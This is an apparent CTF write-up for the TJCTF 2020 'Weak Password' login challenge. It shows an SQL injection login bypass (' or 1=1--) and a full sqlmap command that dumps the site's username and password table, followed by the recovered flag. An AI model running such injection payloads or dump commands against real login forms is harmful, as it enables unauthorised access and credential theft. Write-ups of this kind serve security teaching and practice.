TJCTF2020 - Weak Password
Posted on mar. 02 juin 2020 in CTF
solves : 204
Points: 20
Written by saisree
It seems your login bypass skills are now famous! One of my friends has given you a challenge: figure out his password on this site. He's told me that his username is admin, and that his password is made of up only lowercase letters and numbers. (Wrap the password with tjctf{...})
We have a standard login page with two fields: username
and password
. We need to recover the admin flag.
Let's try some standard SLQi : ' or 1=1--
.
We are login. So, the code form is vunerable. This time, I used sqlmap to dump the table and get the password:
sqlmap https://weak_password.tjctf.org/login --method=POST --data "username=admin&password=admin" -p "password" --not-string="Wrong" --user-agent "Mozilla/5.0 (X11; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0" --tamper=space2comment --level 5 --risk 3 --tables --dump -T userandpassword
Database: SQLite_masterdb
Table: userandpassword
[6 entries]
+----+-----------------------+---------------------+
| id | password | username |
+----+-----------------------+---------------------+
| 1 | blindsqli14519 | admin |
| 2 | random_passwd | random_user |
| 3 | evenmorerandom_passwd | evenmorerandom_user |
| 4 | blindsqli14519 | admin |
| 5 | random_passwd | random_user |
| 6 | evenmorerandom_passwd | evenmorerandom_user |
+----+-----------------------+---------------------+
We got the flag: tjctf{blindsqli14519}
.